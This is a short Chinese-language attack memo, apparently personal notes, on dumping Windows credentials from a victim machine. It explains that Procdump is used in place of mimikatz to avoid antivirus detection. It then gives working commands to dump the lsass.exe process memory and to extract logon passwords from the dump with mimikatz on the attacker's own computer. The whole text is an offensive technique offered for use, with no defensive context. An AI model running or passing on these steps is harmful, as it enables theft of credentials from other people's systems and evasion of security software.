Procdump+mimikatz

原因：由于mimikatz放在被害者电脑上很容易被杀，所以需要在被害机上先去运行Procdump(windows开发的不会被杀，前提被害机是管理员权限)，获取到密码后在自己电脑使用mimikatz破解密码.

打开任务管理器，在进程找Local Security Authority Process，或在详细信息找lsass.exe.找到后直接右键创建转储文件.

将转存的文件放在procdump64.exe同一目录     procdump64.exe -accepteula -ma lsass.exe lsass.DMP   执行命令 （lsass.DMP是转存的文件 ）会生成一个新的dmp文件（lsass.DMP.dmp）

启动mimikatz   输入命令 privilege::debug（提权，前提管理员权限打开），第二条命令：sekurlsa::minidump lsass.DMP.dmp，第三条命令：sekurlsa::logonPasswords full